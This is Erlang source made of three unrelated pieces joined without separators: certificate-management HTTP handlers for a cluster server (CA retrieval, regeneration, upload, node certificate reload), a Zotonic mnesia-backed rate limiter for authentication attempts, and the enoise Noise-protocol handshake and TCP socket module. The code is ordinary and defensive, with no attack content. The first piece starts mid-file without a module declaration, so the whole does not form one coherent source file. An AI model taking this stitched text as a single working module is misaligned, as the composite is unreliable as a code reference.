handle_cluster_certificate_simple(Req) ->
    Cert = case ns_server_cert:cluster_ca() of
               {GeneratedCert, _} ->
                   GeneratedCert;
               {UploadedCAProps, _, _} ->
                   proplists:get_value(pem, UploadedCAProps)
           end,
    menelaus_util:reply_ok(Req, "text/plain", Cert).

%% Format gregorian UTC seconds as a server-local time string.
format_time(UTCSeconds) ->
    LocalTime = calendar:universal_time_to_local_time(
                  calendar:gregorian_seconds_to_datetime(UTCSeconds)),
    menelaus_util:format_server_time(LocalTime, 0).

%% Build the JSON property list for a single certificate warning.
warning_props({expires_soon, UTCSeconds}) ->
    [{message, ns_error_messages:node_certificate_warning(expires_soon)},
     {expires, format_time(UTCSeconds)}];
warning_props(Warning) ->
    [{message, ns_error_messages:node_certificate_warning(Warning)}].

%% Tag a per-node warning with the node it applies to.
translate_warning({Node, Warning}) ->
    [{node, Node} | warning_props(Warning)].
%% Convert certificate properties to JSON-friendly terms: expiry
%% timestamps become formatted local-time strings, string values become
%% binaries, everything else passes through unchanged.
jsonify_cert_props(Props) ->
    [case Prop of
         {expires, UTCSeconds} -> {expires, format_time(UTCSeconds)};
         {Key, Value} when is_list(Value) -> {Key, list_to_binary(Value)};
         _ -> Prop
     end || Prop <- Props].
%% Reply with the cluster CA as JSON, including its type
%% (generated/uploaded) and any validity warnings for uploaded CAs.
handle_cluster_certificate_extended(Req) ->
    {Cert, WarningsJson} =
        case ns_server_cert:cluster_ca() of
            {GeneratedCert, _} ->
                {[{type, generated},
                  {pem, GeneratedCert}], []};
            {UploadedCAProps, _, _} ->
                Warnings = ns_server_cert:get_warnings(UploadedCAProps),
                {[{type, uploaded} | UploadedCAProps],
                 [{translate_warning(Pair)} || Pair <- Warnings]}
        end,
    menelaus_util:reply_json(Req, {[{cert, {jsonify_cert_props(Cert)}},
                                    {warnings, WarningsJson}]}).

%% Regenerate the self-signed cluster certificate and key, wait for the
%% local node to pick it up, audit, and reply with the new PEM.
handle_regenerate_certificate(Req) ->
    menelaus_web:assert_is_enterprise(),
    ns_server_cert:generate_and_set_cert_and_pkey(),
    ns_ssl_services_setup:sync_local_cert_and_pkey_change(),
    ?log_info("Completed certificate regeneration"),
    ns_audit:regenerate_certificate(Req),
    handle_cluster_certificate_simple(Req).

%% Reply 400 with a human-readable validation error.
reply_error(Req, Error) ->
    menelaus_util:reply_json(
      Req, {[{error, ns_error_messages:cert_validation_error_message(Error)}]}, 400).

%% Accept an uploaded PEM CA in the request body, install it as the
%% cluster CA, audit, and reply with the extended JSON view.
handle_upload_cluster_ca(Req) ->
    menelaus_web:assert_is_enterprise(),
    menelaus_web:assert_is_45(),

    case Req:recv_body() of
        undefined ->
            reply_error(Req, empty_cert);
        PemEncodedCA ->
            case ns_server_cert:set_cluster_ca(PemEncodedCA) of
                {ok, Props} ->
                    ns_audit:upload_cluster_ca(Req,
                                               proplists:get_value(subject, Props),
                                               proplists:get_value(expires, Props)),
                    handle_cluster_certificate_extended(Req);
                {error, Error} ->
                    reply_error(Req, Error)
            end
    end.

%% Apply the node certificate chain that was placed in the inbox
%% directory; audit on success, 400 with details on failure.
handle_reload_node_certificate(Req) ->
    menelaus_web:assert_is_enterprise(),
    menelaus_web:assert_is_45(),

    case ns_server_cert:apply_certificate_chain_from_inbox() of
        {ok, Props} ->
            ns_audit:reload_node_certificate(Req,
                                             proplists:get_value(subject, Props),
                                             proplists:get_value(expires, Props)),
            menelaus_util:reply(Req, 200);
        {error, Error} ->
            ?log_error("Error reloading node certificate: ~p", [Error]),
            menelaus_util:reply_json(
              Req, ns_error_messages:reload_node_certificate_error(Error), 400)
    end.
%% Reply with the certificate info of the node identified by NodeId as
%% JSON; 404 when the node is unknown or has no certificate configured.
handle_get_node_certificate(NodeId, Req) ->
    menelaus_web:assert_is_enterprise(),

    case menelaus_web:find_node_hostname(NodeId, Req) of
        false ->
            menelaus_util:reply_text(Req, <<"Node is not found">>, 404);
        {ok, Node} ->
            case ns_server_cert:get_node_cert_info(Node) of
                [] ->
                    menelaus_util:reply_text(
                      Req, <<"Certificate is not set up on this node">>, 404);
                Props ->
                    menelaus_util:reply_json(Req, {jsonify_cert_props(Props)})
            end
    end.
%% @author <NAME> <<EMAIL>>
%% @copyright 2019 Driebit BV
%% @doc Rate limiting of authentication tries and other types of requests
%% Copyright 2019 Driebit BV
%%
%% Licensed under the Apache License, Version 2.0 (the "License");
%% you may not use this file except in compliance with the License.
%% You may obtain a copy of the License at
%%
%% http://www.apache.org/licenses/LICENSE-2.0
%%
%% Unless required by applicable law or agreed to in writing, software
%% distributed under the License is distributed on an "AS IS" BASIS,
%% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
%% See the License for the specific language governing permissions and
%% limitations under the License.
-module(m_ratelimit).
-behaviour(zotonic_model).
-export([
m_get/3,
init/1,
insert_event/4,
insert_event/5,
is_event_limited/4,
list_event/3,
delete_event/3,
prune/1
]).
-include_lib("zotonic_core/include/zotonic.hrl").
-include_lib("stdlib/include/qlc.hrl").
-type device_id() :: binary() | undefined.
% Failure event for the given key/device.
-record(ratelimit_event, {
key :: {atom(), binary()},
device :: device_id(),
timestamp :: pos_integer(),
props :: proplists:proplist()
}).
% Default period for counting events
-define(RATELIMIT_T, 3600).
% Default number of event before restriction
-define(RATELIMIT_N, 5).
%% Template model lookup: m.ratelimit.timeout returns the configured
%% event-counting window in seconds.
m_get([ <<"timeout">> | Rest ], _Msg, Context) ->
    {ok, {ratelimit_t(Context), Rest}}.

%% @doc Insert an event, use the context for extra properties.
-spec insert_event( atom(), binary(), device_id(), z:context() ) -> ok | {error, term()}.
insert_event(Type, Key, Device, Context) ->
    %% Record the request peer and user agent alongside the event.
    Props = [
        {peer, m_req:get(peer, Context)},
        {user_agent, m_req:get(user_agent, Context)}
    ],
    insert_event(Type, Key, Device, Props, Context).
%% @doc Insert an event, with extra properties. Returns ok on success
%% or {error, Reason} when the mnesia transaction aborts.
%% Fix: the spec previously claimed `-> ok.' although the
%% `{aborted, Reason}' branch returns `{error, Reason}'; it now matches
%% the implementation (and the insert_event/4 spec above).
-spec insert_event( atom(), binary(), device_id(), proplists:proplist(), z:context() ) -> ok | {error, term()}.
insert_event(Type, Key, Device, Props, Context) ->
    Event = #ratelimit_event{
        key = {Type, Key},
        device = Device,
        timestamp = z_datetime:timestamp(),
        props = Props
    },
    %% Write inside a transaction; map mnesia's result to ok/{error,_}.
    case mnesia:transaction( fun() -> mnesia:write(event_table(Context), Event, write) end ) of
        {atomic, _} -> ok;
        {aborted, Reason} -> {error, Reason}
    end.
%% @doc Check if the key/device is rate limited due to previous events.
%% True when at least ratelimit_n events were recorded for this
%% key/device within the last ratelimit_t seconds.
-spec is_event_limited( atom(), binary(), device_id(), z:context() ) -> boolean().
is_event_limited( Type, Key, Device, Context ) ->
    T = z_datetime:timestamp() - ratelimit_t(Context),
    %% Dirty read is fine here: an occasional off-by-one count is
    %% acceptable for rate limiting.
    List = mnesia:dirty_read( event_table(Context), {Type, Key} ),
    Filtered = lists:filter(
        fun(R) ->
            R#ratelimit_event.device =:= Device
            andalso R#ratelimit_event.timestamp >= T
        end,
        List),
    length(Filtered) >= ratelimit_n(Context).

%% @doc Return all entries for an event
-spec list_event( atom(), binary(), z:context() ) -> list().
list_event(Type, Key, Context) ->
    mnesia:dirty_read( event_table(Context), {Type, Key} ).

%% @doc Delete all entries for an event
-spec delete_event( atom(), binary(), z:context() ) -> ok.
delete_event(Type, Key, Context) ->
    {atomic, _} = mnesia:transaction(
        fun() ->
            mnesia:delete({ event_table(Context), {Type, Key}})
        end),
    ok.

%% Create the per-site mnesia bag table for events; persisted to disc
%% only when mnesia has a configured directory. Idempotent.
-spec init( z:context() ) -> ok.
init(Context) ->
    TabName = event_table(Context),
    TabDef = [
        {type, bag},
        {record_name, ratelimit_event},
        {attributes, record_info(fields, ratelimit_event)}
        | case application:get_env(mnesia, dir) of
             {ok, _} -> [ {disc_copies, [node()]} ];
             undefined -> []
          end
    ],
    case mnesia:create_table(TabName, TabDef) of
        {atomic, ok} -> ok;
        {aborted, {already_exists, TabName}} -> ok
    end.
%% Event counting window in seconds; falls back to ?RATELIMIT_T when
%% the config value is unset or empty.
-spec ratelimit_t( z:context() ) -> integer().
ratelimit_t(Context) ->
    case m_config:get_value(mod_ratelimit, event_period, Context) of
        V when V =:= <<>>; V =:= undefined -> ?RATELIMIT_T;
        T -> z_convert:to_integer(T)
    end.
%% Maximum number of events inside the window before limiting kicks in;
%% falls back to ?RATELIMIT_N when the config value is unset or empty.
-spec ratelimit_n( z:context() ) -> integer().
ratelimit_n(Context) ->
    case m_config:get_value(mod_ratelimit, event_count, Context) of
        V when V =:= <<>>; V =:= undefined -> ?RATELIMIT_N;
        N -> z_convert:to_integer(N)
    end.
%% Remove all events that fell outside the counting window, in a single
%% transaction. Intended to be run periodically.
-spec prune(z:context()) -> ok.
prune(Context) ->
    Table = event_table(Context),
    Oldest = z_datetime:timestamp() - ratelimit_t(Context) - 1,
    PruneFun = fun() ->
        %% Select everything older than the window and delete it.
        Query = qlc:q([ Ev || Ev <- mnesia:table(Table), Ev#ratelimit_event.timestamp < Oldest ]),
        lists:foreach(
            fun(Ev) -> mnesia:delete_object(Table, Ev, write) end,
            qlc:e(Query))
    end,
    {atomic, _} = mnesia:transaction(PruneFun),
    ok.
%% Per-site mnesia table name for rate-limit events, e.g.
%% 'ratelimit_event-mysite'. Site names come from trusted configuration,
%% so list_to_atom/1 is safe here.
event_table(Context) ->
    Site = z_convert:to_list(z_context:site(Context)),
    list_to_atom("ratelimit_event-" ++ Site).
%%% ------------------------------------------------------------------
%%% @copyright 2018, <NAME>
%%%
%%% @doc Module is an interface to the Noise protocol
%%% [https://noiseprotocol.org]
%%%
%%% The module implements Noise handshake in `handshake/3'.
%%%
%%% For convenience there is also an API to use Noise over TCP (i.e. `gen_tcp')
%%% and after "upgrading" a `gen_tcp'-socket into a `enoise'-socket it has a
%%% similar API as `gen_tcp'.
%%%
%%% @end ------------------------------------------------------------------
-module(enoise).
%% Main function with generic Noise handshake
-export([handshake/2, handshake/3, step_handshake/2]).
%% API exports - Mainly mimicing gen_tcp
-export([ accept/2
, close/1
, connect/2
, controlling_process/2
, send/2
, set_active/2 ]).
-record(enoise, { pid }).
-type noise_key() :: binary().
-type noise_keypair() :: enoise_keypair:keypair().
-type noise_options() :: [noise_option()].
%% A list of Noise options is a proplist, it *must* contain a value `noise'
%% that describes which Noise configuration to use. It is possible to give a
%% `prologue' to the protocol. And for the protocol to work, the correct
%% configuration of pre-defined keys (`s', `e', `rs', `re') should also be
%% provided.
-type noise_option() :: {noise, noise_protocol_option()} %% Required
| {e, noise_keypair()} %% Mandatary depending on `noise'
| {s, noise_keypair()}
| {re, noise_key()}
| {rs, noise_key()}
| {prologue, binary()} %% Optional
| {timeout, integer() | infinity}. %% Optional
-type noise_protocol_option() :: enoise_protocol:protocol() | string() |
binary().
%% Either an instantiated Noise protocol configuration or the name of a Noise
%% configuration (either as a string or a binary string).
-type com_state_state() :: term().
%% The state part of a communiction state
-type recv_msg_fun() :: fun((com_state_state(), integer() | infinity) ->
{ok, binary(), com_state_state()} | {error, term()}).
%% Function that receive a message
-type send_msg_fun() :: fun((com_state_state(), binary()) -> ok).
%% Function that sends a message
-type noise_com_state() :: #{ recv_msg := recv_msg_fun(),
send_msg := send_msg_fun(),
state := term() }.
%% Noise communication state - used to parameterize a handshake. Consists of a
%% send function, one receive function, and an internal state.
-type noise_split_state() :: enoise_hs_state:noise_split_state().
%% Return value from the final `split' operation. Provides a CipherState for
%% receiving and a CipherState transmission. Also includes the final handshake
%% hash for channel binding.
-opaque noise_socket() :: #enoise{}.
%% An abstract Noise socket - holds a reference to a socket that has completed
%% a Noise handshake.
-export_type([noise_socket/0]).
%%====================================================================
%% API functions
%%====================================================================
%% @doc Begin a step-by-step Noise handshake; the returned handshake
%% state is advanced with {@link step_handshake/2}.
%% @end
-spec handshake(Options :: noise_options(),
                Role :: enoise_hs_state:noise_role()) ->
        {ok, enoise_hs_state:state()} | {error, term()}.
handshake(Options, Role) ->
    {ok, create_hstate(Options, Role)}.
%% @doc Do a step (either `{send, Payload}', `{rcvd, EncryptedData}',
%% or `done')
%% @end
-spec step_handshake(HState :: enoise_hs_state:state(),
Data :: {rcvd, binary()} | {send, binary()}) ->
{ok, send, binary(), enoise_hs_state:state()}
| {ok, rcvd, binary(), enoise_hs_state:state()}
| {ok, done, noise_split_state()}
| {error, term()}.
step_handshake(HState, Data) ->
do_step_handshake(HState, Data).
%% @doc Performs a complete Noise handshake, driving the send/receive
%% callbacks in `ComState' until the handshake is finished. An optional
%% `timeout' option (milliseconds, default `infinity') bounds each receive.
%% @end
-spec handshake(Options :: noise_options(),
                Role :: enoise_hs_state:noise_role(),
                ComState :: noise_com_state()) ->
        {ok, noise_split_state(), noise_com_state()} | {error, term()}.
handshake(Options, Role, ComState) ->
    Timeout = proplists:get_value(timeout, Options, infinity),
    do_handshake(create_hstate(Options, Role), ComState, Timeout).
%% @doc Upgrades a gen_tcp, or equivalent, connected socket to a Noise socket,
%% that is, performs the client-side (initiator) noise handshake.
%%
%% Note: The TCP socket has to be in mode `{active, true}' or `{active, once}';
%% passive receive is not supported.
%%
%% {@link noise_options()} is a proplist.
%% @end
-spec connect(TcpSock :: gen_tcp:socket(),
              Options :: noise_options()) ->
        {ok, noise_socket(), enoise_hs_state:state()} | {error, term()}.
connect(TcpSock, Options) ->
    tcp_handshake(TcpSock, initiator, Options).
%% @doc Upgrades a gen_tcp, or equivalent, connected socket to a Noise socket,
%% that is, performs the server-side (responder) noise handshake.
%%
%% Note: The TCP socket has to be in mode `{active, true}' or `{active, once}';
%% passive receive is not supported.
%%
%% {@link noise_options()} is a proplist.
%% @end
-spec accept(TcpSock :: gen_tcp:socket(),
             Options :: noise_options()) ->
        {ok, noise_socket(), enoise_hs_state:state()} | {error, term()}.
accept(TcpSock, Options) ->
    tcp_handshake(TcpSock, responder, Options).
%% @doc Writes `Data' to `Socket' (encrypted by the connection process).
%% @end
-spec send(Socket :: noise_socket(), Data :: binary()) -> ok | {error, term()}.
send(Socket, Data) ->
    #enoise{ pid = ConnPid } = Socket,
    enoise_connection:send(ConnPid, Data).
%% @doc Closes a Noise connection by stopping its connection process.
%% @end
-spec close(NoiseSock :: noise_socket()) -> ok | {error, term()}.
close(NoiseSock) ->
    #enoise{ pid = ConnPid } = NoiseSock,
    enoise_connection:close(ConnPid).
%% @doc Assigns a new controlling process to the Noise socket. A controlling
%% process is the owner of a Noise socket, and receives all messages from
%% the socket.
%% @end
-spec controlling_process(Socket :: noise_socket(), Pid :: pid()) ->
        ok | {error, term()}.
controlling_process(Socket, NewOwner) ->
    #enoise{ pid = ConnPid } = Socket,
    enoise_connection:controlling_process(ConnPid, NewOwner).
%% @doc Sets the active option to `true' or `once'. Note that `N' and
%% `false' are not valid options for a Noise socket.
%% @end
-spec set_active(Socket :: noise_socket(), Mode :: true | once) ->
        ok | {error, term()}.
set_active(Socket, Mode) ->
    #enoise{ pid = ConnPid } = Socket,
    enoise_connection:set_active(ConnPid, Mode).
%%====================================================================
%% Internal functions
%%====================================================================
%% Drives a handshake to completion over the given communication state,
%% alternating between reading and writing handshake messages as dictated
%% by enoise_hs_state:next_message/1, until the handshake is done.
do_handshake(HState, ComState, Timeout) ->
    case enoise_hs_state:next_message(HState) of
        in ->
            handshake_recv_step(HState, ComState, Timeout);
        out ->
            handshake_send_step(HState, ComState, Timeout);
        done ->
            {ok, Res} = enoise_hs_state:finalize(HState),
            {ok, Res, ComState}
    end.

%% Receive and process one incoming handshake message, then continue.
handshake_recv_step(HState, ComState, Timeout) ->
    case hs_recv_msg(ComState, Timeout) of
        {ok, Data, ComState1} ->
            case enoise_hs_state:read_message(HState, Data) of
                {ok, HState1, _Msg} -> do_handshake(HState1, ComState1, Timeout);
                Err = {error, _}    -> Err
            end;
        Err = {error, _} ->
            Err
    end.

%% Produce and transmit one outgoing handshake message (empty payload),
%% then continue.
handshake_send_step(HState, ComState, Timeout) ->
    {ok, HState1, Msg} = enoise_hs_state:write_message(HState, <<>>),
    case hs_send_msg(ComState, Msg) of
        {ok, ComState1}  -> do_handshake(HState1, ComState1, Timeout);
        Err = {error, _} -> Err
    end.
%% Invoke the user-supplied receive callback and thread its updated
%% internal state back into the communication state map. Errors from the
%% callback are returned untouched.
hs_recv_msg(ComState, Timeout) ->
    #{ recv_msg := RecvFun, state := InnerState } = ComState,
    case RecvFun(InnerState, Timeout) of
        {ok, Data, InnerState1} -> {ok, Data, ComState#{ state := InnerState1 }};
        Err = {error, _}        -> Err
    end.
%% Invoke the user-supplied send callback and thread its updated internal
%% state back into the communication state map. Errors from the callback
%% are returned untouched.
hs_send_msg(ComState, Data) ->
    #{ send_msg := SendFun, state := InnerState } = ComState,
    case SendFun(InnerState, Data) of
        {ok, InnerState1} -> {ok, ComState#{ state := InnerState1 }};
        Err = {error, _}  -> Err
    end.
%% One step of the interactive handshake. The expected direction is taken
%% from the handshake state and must agree with the caller-supplied Data;
%% a mismatch yields an {invalid_step, ...} error.
do_step_handshake(HState, Data) ->
    Next = enoise_hs_state:next_message(HState),
    case {Next, Data} of
        {in, {rcvd, Encrypted}} ->
            case enoise_hs_state:read_message(HState, Encrypted) of
                {ok, HState1, Msg} -> {ok, rcvd, Msg, HState1};
                Err = {error, _}   -> Err
            end;
        {out, {send, Payload}} ->
            {ok, HState1, Msg} = enoise_hs_state:write_message(HState, Payload),
            {ok, send, Msg, HState1};
        {done, done} ->
            {ok, Res} = enoise_hs_state:finalize(HState),
            {ok, done, Res};
        {_, _} ->
            {error, {invalid_step, expected, Next, got, Data}}
    end.
%% -- gen_tcp specific functions ---------------------------------------------
%% Check that the TCP socket is configured compatibly with Noise framing,
%% look up its current active mode, and run the handshake over it.
tcp_handshake(TcpSock, Role, Options) ->
    case check_gen_tcp(TcpSock) of
        {error, _} = Err ->
            Err;
        ok ->
            case inet:getopts(TcpSock, [active]) of
                {ok, [{active, Active}]} ->
                    do_tcp_handshake(Options, Role, TcpSock, Active);
                {error, _} = Err ->
                    Err
            end
    end.
%% Run the handshake using the gen_tcp send/receive callbacks, then hand
%% the socket, the resulting cipher states, and any leftover buffered
%% bytes over to a freshly started enoise_connection process.
do_tcp_handshake(Options, Role, TcpSock, Active) ->
    ComState0 = #{ recv_msg => fun gen_tcp_rcv_msg/2,
                   send_msg => fun gen_tcp_snd_msg/2,
                   state    => {TcpSock, Active, <<>>} },
    case handshake(Options, Role, ComState0) of
        {ok, #{ rx := Rx, tx := Tx, final_state := FState },
             #{ state := {_, _, RemBuf} }} ->
            case enoise_connection:start_link(TcpSock, Rx, Tx, self(), {Active, RemBuf}) of
                {ok, ConnPid}    -> {ok, #enoise{ pid = ConnPid }, FState};
                {error, _} = Err -> Err
            end;
        {error, _} = Err ->
            Err
    end.
%% Build the initial handshake state from the option list. The `noise'
%% option may be a protocol name (string or binary) or an already-parsed
%% enoise_protocol term, which is passed through as-is.
create_hstate(Options, Role) ->
    Get = fun(Key) -> proplists:get_value(Key, Options, undefined) end,
    Protocol =
        case proplists:get_value(noise, Options) of
            Name when is_binary(Name); is_list(Name) ->
                enoise_protocol:from_name(Name);
            Parsed ->
                Parsed
        end,
    Prologue = proplists:get_value(prologue, Options, <<>>),
    %% {Static, Ephemeral, RemoteStatic, RemoteEphemeral} key material.
    Keys = {Get(s), Get(e), Get(rs), Get(re)},
    enoise_hs_state:init(Protocol, Role, Prologue, Keys).
%% Verify that the socket options are compatible with Noise framing
%% (raw binary packets, active or active-once mode, no header bytes, no
%% packet size limit) and take ownership of the socket on success.
check_gen_tcp(TcpSock) ->
    case inet:getopts(TcpSock, [mode, packet, active, header, packet_size]) of
        {ok, TcpOpts} ->
            PacketOk = lists:member(proplists:get_value(packet, TcpOpts, 0), [0, raw]),
            ActiveOk = lists:member(proplists:get_value(active, TcpOpts, 0), [true, once]),
            HeaderOk = proplists:get_value(header, TcpOpts, 0) == 0,
            PSizeOk  = proplists:get_value(packet_size, TcpOpts, undefined) == 0,
            ModeOk   = proplists:get_value(mode, TcpOpts, binary) == binary,
            case PacketOk andalso ActiveOk andalso HeaderOk andalso PSizeOk andalso ModeOk of
                true  -> gen_tcp:controlling_process(TcpSock, self());
                false -> {error, {invalid_tcp_options, TcpOpts}}
            end;
        {error, _} = Err ->
            Err
    end.
%% Send one Noise message framed with a 16-bit big-endian length prefix.
%% The communication state is returned unchanged on success.
gen_tcp_snd_msg(S = {TcpSock, _, _}, Msg) ->
    Frame = <<(byte_size(Msg)):16, Msg/binary>>,
    case gen_tcp:send(TcpSock, Frame) of
        ok               -> {ok, S};
        {error, _} = Err -> Err
    end.
%% Receive one Noise message framed with a 16-bit big-endian length prefix.
%% Data arrives via active-mode {tcp, Sock, Data} messages; partial frames
%% are accumulated in Buf until a complete message is available.
%%
%% NOTE(review): if Buf already holds a complete frame this still blocks
%% waiting for more TCP data first; during a (strictly alternating) Noise
%% handshake that should not arise, and leftover buffered bytes are handed
%% over to enoise_connection afterwards - confirm if reused elsewhere.
gen_tcp_rcv_msg({TcpSock, Active, Buf}, Timeout) ->
    receive {tcp, TcpSock, Data} ->
        %% Immediately re-arm {active, once}; {active, true} needs no re-arming.
        [ inet:setopts(TcpSock, [{active, once}]) || Active == once ],
        case <<Buf/binary, Data/binary>> of
            Buf1 = <<Len:16, Rest/binary>> when byte_size(Rest) < Len ->
                %% Incomplete frame - keep accumulating. Preserve the original
                %% Active mode so 'once' keeps being re-armed (this was
                %% previously hard-coded to 'true', which stopped the
                %% re-arming after the first message and could hang a
                %% multi-message handshake on an {active, once} socket).
                gen_tcp_rcv_msg({TcpSock, Active, Buf1}, Timeout);
            <<Len:16, Rest/binary>> ->
                <<Data1:Len/binary, Buf1/binary>> = Rest,
                {ok, Data1, {TcpSock, Active, Buf1}}
        end
    after Timeout ->
        {error, timeout}
    end.